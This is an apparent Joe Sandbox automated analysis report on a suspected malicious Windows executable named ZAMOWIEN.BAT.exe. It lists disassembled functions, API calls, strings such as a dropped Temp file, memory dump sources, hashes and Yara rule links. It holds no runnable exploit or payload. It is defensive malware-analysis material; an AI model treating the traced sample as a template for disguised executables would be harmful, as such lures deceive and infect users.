lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00405F5D
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403638,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403935,?,00000008,0000000A,0000000C), ref: 00405F67
lstrcatW.KERNEL32(?,0040A014,?,00000008,0000000A,0000000C), ref: 00405F79

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F57

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-3081826266
Opcode ID: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction ID: a1bccca0734cb19cec55edcb2d79c084926cf842adef9b90b7d7329303d93a28
Opcode Fuzzy Hash: 1ad634ba4b40e47f3a67f9c69e663da68b942b7adec5edae9754e9c2c01f4b37
Instruction Fuzzy Hash: 23D0A771101938AAC211AF548E04CDF639C9F86304741443BF601B30A1CF7D6D6187FD

Function 6E3510E1 Relevance: 6.4, APIs: 5, Instructions: 145memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 6E351171
GlobalAlloc.KERNEL32(00000040,?), ref: 6E3511E3
GlobalFree.KERNEL32 ref: 6E35124A
GlobalFree.KERNEL32(?), ref: 6E35129B
GlobalFree.KERNEL32(00000000), ref: 6E3512B1

Memory Dump Source

Source File: 00000000.00000002.2093089192.000000006E351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6E350000, based on PE: true

Associated: 00000000.00000002.2093066982.000000006E350000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093101356.000000006E354000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.2093112847.000000006E356000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6e350000_ZAMOWIEN.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 8dfc71b79d797c8839054847e5ff9bd882c3b44bc272753065261b31d31b983c
Instruction ID: b366facb0163075d7545ec69628b4cd532688a366884276aec09d27fc6206e7c
Opcode Fuzzy Hash: 8dfc71b79d797c8839054847e5ff9bd882c3b44bc272753065261b31d31b983c
Instruction Fuzzy Hash: DD517CB5500B02EFDB40CFA9C854E6677ACFB0A315F60499AE945DB310E775E928CBA0

Function 00403C68 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20COMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(000002EC,C:\Users\user\AppData\Local\Temp\,00403B9B,0000000A,?,00000008,0000000A,0000000C), ref: 00403C7A
CloseHandle.KERNEL32(000002F8,C:\Users\user\AppData\Local\Temp\,00403B9B,0000000A,?,00000008,0000000A,0000000C), ref: 00403C8E

Strings

C:\Users\user\AppData\Local\Temp\nssF88.tmp, xrefs: 00403C9E
C:\Users\user\AppData\Local\Temp\, xrefs: 00403C6D

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nssF88.tmp
API String ID: 2962429428-1606597781
Opcode ID: e9799f2a870c612edbca9996970ca19c8aefa2ea74540a2b7a3064651f3422cf
Instruction ID: ee432799f0ec97ad8bac589890cd58f61dc0b37f2b9852f01e7d3a9725a2cd47
Opcode Fuzzy Hash: e9799f2a870c612edbca9996970ca19c8aefa2ea74540a2b7a3064651f3422cf
Instruction Fuzzy Hash: 08E08C3240471896E620AF7DEE4E9853B185F41335B248326F179F21F1C7389A9B5AA9

Function 00405FA3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 00405FA9
CharPrevW.USER32(?,00000000,?,C:\Users\user\Desktop,00403141,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,C:\Users\user\Desktop\ZAMOWIEN.BAT.exe,80000000,00000003), ref: 00405FB9

Strings

C:\Users\user\Desktop, xrefs: 00405FA3

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction ID: 55101ecdc9b25a232956a600f416f74c0c7d3acb65b29bb40db80f9a0bd4f09e
Opcode Fuzzy Hash: 4d9a109f9f2e29ac56c0736ccbd4fa6bf3a04a93e1f4050107f2eb61dc35f761
Instruction Fuzzy Hash: 46D05EB2411921DAD312AB04DD00D9F67ACEF12300B468826E840A61A2DB785D9186BC

Function 004060DD Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 004060ED
lstrcmpiA.KERNEL32(?,?), ref: 00406105
CharNextA.USER32(?,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 00406116
lstrlenA.KERNEL32(?,?,00000000,004063C2,00000000,[Rename],00000000,00000000,00000000), ref: 0040611F

Memory Dump Source

Source File: 00000000.00000002.2060912923.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2060898572.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060931678.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.0000000000788000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007A5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2060951718.00000000007DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2061326942.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZAMOWIEN.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction ID: 69188793eccd29a777f9cf0bf9f116da7637de918d17396429826200b3a59f8b
Opcode Fuzzy Hash: 95544cd0fbc1c68b6442233ab1bb13ea59abf9e1bd9498eecabbd7b85e38d71d
Instruction Fuzzy Hash: D0F09631504458FFC712DFA5DD00D9EBFA8EF45350B2640B9E841FB211D674DE119B59

Analysis Process: ZAMOWIEN.BAT.exePID: 8036, Parent PID: 7448COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	100%
Total number of Nodes:	1
Total number of Limit Nodes:	0

Executed Functions

Function 328335C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 328335CA

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2c797a71b90de460a3f409f9d5311cfc20bae4a0f266272b86ff329b0ec883c6
Instruction ID: b876ad6c7b7786083c87f716f7f8f78ff945cbe96852c29d14b8288a73e76615
Opcode Fuzzy Hash: 2c797a71b90de460a3f409f9d5311cfc20bae4a0f266272b86ff329b0ec883c6
Instruction Fuzzy Hash: 7590023560550807D100B1589A14706100547D0301F65C813A0424528D8BD58A6965A3

Function 32832B60 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 32832B6A

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 5d546f405a82efbcf38434b52947e38c79bfae03cdbdaa7e6ebed4c55b706548
Instruction ID: 5232fe914cebe33a024c58d18382a45362806d4af8672fe76904b1bf62b6963f
Opcode Fuzzy Hash: 5d546f405a82efbcf38434b52947e38c79bfae03cdbdaa7e6ebed4c55b706548
Instruction Fuzzy Hash: 7B900265202404074105B1589914616400A47E0301B55C423E1014550DC9A589A96126

Function 32832C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 32832C7A

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: b0068462c756306acb575bd3a082d5216bb77dca74fcd1fd74885b4e9c3b3b07
Instruction ID: 7a8ba321eb05e14fbd7d69d5292b1b9c0c6875137c4168a37d95499366341c21
Opcode Fuzzy Hash: b0068462c756306acb575bd3a082d5216bb77dca74fcd1fd74885b4e9c3b3b07
Instruction Fuzzy Hash: EE90023520148C07D110B158D90474A000547D0301F59C813A4424618D8AD589A97122

Function 32832DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 32832DFA

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4c4828e382005cd38821005326ea8f4092c24f8971bf81ab1f40e1f5c96a0a2f
Instruction ID: c00839d008cd90881e2a0ba91d95ffbda3aac4d7cbed04148db352fe97cff8d1
Opcode Fuzzy Hash: 4c4828e382005cd38821005326ea8f4092c24f8971bf81ab1f40e1f5c96a0a2f
Instruction Fuzzy Hash: EA90023520140817D111B1589A04707000947D0341F95C813A0424518D9AD68A6AA122

Non-executed Functions

Function 328994E0 Relevance: 19.8, APIs: 8, Strings: 3, Instructions: 558
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 32899688
RtlDebugPrintTimes.NTDLL ref: 32899727
RtlDebugPrintTimes.NTDLL ref: 32899807
RtlDebugPrintTimes.NTDLL ref: 328998E5
RtlDebugPrintTimes.NTDLL ref: 328999EA
RtlDebugPrintTimes.NTDLL ref: 32899A81
RtlDebugPrintTimes.NTDLL ref: 32899B94
RtlDebugPrintTimes.NTDLL ref: 32899CFC

Strings

0, xrefs: 32899BF6
, xrefs: 32899AD7
, xrefs: 32899B84

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: $ $0
API String ID: 3446177414-3352262554
Opcode ID: 4b58d5823100c59aba3b2803e2cbfc6e771cbdd84997eb6a740a5da18576b36d
Instruction ID: 304aa72c8fe62753298248c177c8b9d7e02e1d0a614fc63a2c00645b6e714c5c
Opcode Fuzzy Hash: 4b58d5823100c59aba3b2803e2cbfc6e771cbdd84997eb6a740a5da18576b36d
Instruction Fuzzy Hash: 993209B96083818FE314CF68C584B9BBBE5BF88348F04492DF59987350DB75E94ACB52

Function 328A0274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlDebugPrintTimes.NTDLL ref: 328A02A8

Strings

Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 328A069F
Just reallocated block at %p to %Ix bytes, xrefs: 328A05F1
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 328A04D3
HEAP: , xrefs: 328A03A6, 328A04B5, 328A05DD, 328A0682, 328A06D9
HEAP[%wZ]: , xrefs: 328A0399, 328A04A8, 328A05D0, 328A0675, 328A06CC
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 328A06EA
RtlReAllocateHeap, xrefs: 328A02BF, 328A0362
About to reallocate block at %p to %Ix bytes, xrefs: 328A03BA

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 3446177414-1700792311
Opcode ID: b2447ca626cab5d4b2974a8cad97374dd474f9d6f8746dac9f74a899738e16d1
Instruction ID: 6b312aa46eb7d7d0344b8c7cdf610cb5e6b38832cfa8a7f7aa736f2ffaabdffa
Opcode Fuzzy Hash: b2447ca626cab5d4b2974a8cad97374dd474f9d6f8746dac9f74a899738e16d1
Instruction Fuzzy Hash: 79D1DE79901795EFDB02CF68C464BAEBBF1FF4A308F048459E449AB252CF759981CB60

Function 3289F525 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 231timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3289F556

Strings

Just allocated block at %p for %Ix bytes, xrefs: 3289F708
RtlAllocateHeap, xrefs: 3289F56D
HEAP: , xrefs: 3289F6F4, 3289F7A1, 3289F7F8
HEAP[%wZ]: , xrefs: 3289F6E7, 3289F794, 3289F7EB
Just allocated block at %p for 0x%Ix bytes with tag %ws, xrefs: 3289F7BE
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 3289F809

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
API String ID: 3446177414-1745908468
Opcode ID: 2d98ee7db7b7dbee61f545194c966a45782c89344edb0bdbfb22315b50745b6a
Instruction ID: 172e6e648323ba0d69e97c412d353790d017d2ed172dc1245b9599af2c9e7fd4
Opcode Fuzzy Hash: 2d98ee7db7b7dbee61f545194c966a45782c89344edb0bdbfb22315b50745b6a
Instruction Fuzzy Hash: 44910F79901785DFEB0ACF68C440BD9BBF1BF29304F14805DE459AB2A2CB719881CB10

Function 328A12ED Relevance: 11.8, Strings: 9, Instructions: 515COMMON

Download Yara Rule

Strings

Heap block at %p has incorrect segment offset (%x), xrefs: 328A181A
Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x), xrefs: 328A18F8
HEAP: , xrefs: 328A1706, 328A1756, 328A17A8, 328A1809, 328A184D, 328A1895, 328A18E6
Heap entry %p has incorrect PreviousSize field (%04x instead of %04x), xrefs: 328A186B
Heap block at %p has corrupted PreviousSize (%lx), xrefs: 328A176D
Heap block at %p is not last block in segment (%p), xrefs: 328A17B7
Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x), xrefs: 328A18A5
HEAP[%wZ]: , xrefs: 328A16CD, 328A16F9, 328A1749, 328A179B, 328A17FC, 328A1840, 328A18D9
Free Heap block %p modified at %p after it was freed, xrefs: 328A171B

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: Free Heap block %p modified at %p after it was freed$HEAP: $HEAP[%wZ]: $Heap Segment at %p contains invalid NumberOfUnCommittedPages (%x != %x)$Heap Segment at %p contains invalid NumberOfUnCommittedRanges (%x != %x)$Heap block at %p has corrupted PreviousSize (%lx)$Heap block at %p has incorrect segment offset (%x)$Heap block at %p is not last block in segment (%p)$Heap entry %p has incorrect PreviousSize field (%04x instead of %04x)
API String ID: 0-3591852110
Opcode ID: 8c3efed3126fa78f56edb891d137ded6a0fd47f692cb921726a3fd3d3a7bdc77
Instruction ID: d6aa03dc18edb0744ef81cb990249040a2175c6adf02d178c98a835f3b272d80
Opcode Fuzzy Hash: 8c3efed3126fa78f56edb891d137ded6a0fd47f692cb921726a3fd3d3a7bdc77
Instruction Fuzzy Hash: 0D12BD78600756DFE7158F28C464BBABBF6FF09B54F448499E49A8B641DF34E880CB60

Function 327ED34C Relevance: 11.6, Strings: 9, Instructions: 312COMMON

Download Yara Rule

Strings

\Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 327ED3B6
Control Panel\Desktop\MuiCached, xrefs: 327ED62B
@, xrefs: 327ED49D
PreferredUILanguages, xrefs: 327ED4B8, 327ED4C5
@, xrefs: 327ED663
MachinePreferredUILanguages, xrefs: 327ED685
@, xrefs: 327ED3E9
PreferredUILanguagesPending, xrefs: 3284A8DE
Control Panel\Desktop, xrefs: 327ED45D

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID:
String ID: @$@$@$Control Panel\Desktop$Control Panel\Desktop\MuiCached$MachinePreferredUILanguages$PreferredUILanguages$PreferredUILanguagesPending$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings
API String ID: 0-3532704233
Opcode ID: 76b8953c2b6ea2362de92f46ce55c2ddcf03c1698aaf2904916c68da0f318f5d
Instruction ID: 68960f19f1b33f1964ce1f94f0f5e08698337ecac0b1f2be9920882f3cf743c3
Opcode Fuzzy Hash: 76b8953c2b6ea2362de92f46ce55c2ddcf03c1698aaf2904916c68da0f318f5d
Instruction Fuzzy Hash: 5DB1AEB95083559FD715CF28C450B5BBBE9BF88788F41492EF999DB200DB70D904CBA2

Function 32801070 Relevance: 11.4, APIs: 2, Strings: 4, Instructions: 940timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 32855672

Strings

@, xrefs: 32855A53
HEAP: , xrefs: 32855884
HEAP[%wZ]: , xrefs: 32855877
!(CheckedFlags & ~HEAP_CREATE_VALID_MASK), xrefs: 3285588F

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_327c0000_ZAMOWIEN.jbxd

Similarity

API ID: DebugPrintTimes
String ID: !(CheckedFlags & ~HEAP_CREATE_VALID_MASK)$@$HEAP: $HEAP[%wZ]:
API String ID: 3446177414-3570731704
Opcode ID: 6e0129bc48e4839fdb64d6b211c5ff98ed2a482f02a67fb8d4880c0e1dfaef9e
Instruction ID: 8a5b986c8f02c123e5f0dbb90acf71e9985b234ba5b4fe120ff61af0fc25fff1
Opcode Fuzzy Hash: 6e0129bc48e4839fdb64d6b211c5ff98ed2a482f02a67fb8d4880c0e1dfaef9e
Instruction Fuzzy Hash: C9925779A01368DFEB24CB18CC80B99B7B1BF44764F1181EAE94DA7291DB749E80CF51

Function 3281D7B0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 151timeCOMMON

Download Yara Rule

APIs

RtlDebugPrintTimes.NTDLL ref: 3281D959

Part of subcall function 327F4859: RtlDebugPrintTimes.NTDLL ref: 327F48F7

Strings

$, xrefs: 3281D900
$, xrefs: 3281D86D
Process 0x%p (%wZ) exiting, xrefs: 3285F2C7
LdrShutdownProcess, xrefs: 3285F2CE
minkernel\ntdll\ldrinit.c, xrefs: 3285F2D8

Memory Dump Source

Source File: 00000004.00000002.2457017858.00000000327C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 327C0000, based on PE: true

Associated: 00000004.00000002.2457017858.00000000328E9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.00000000328ED000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.2457017858.000000003295E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

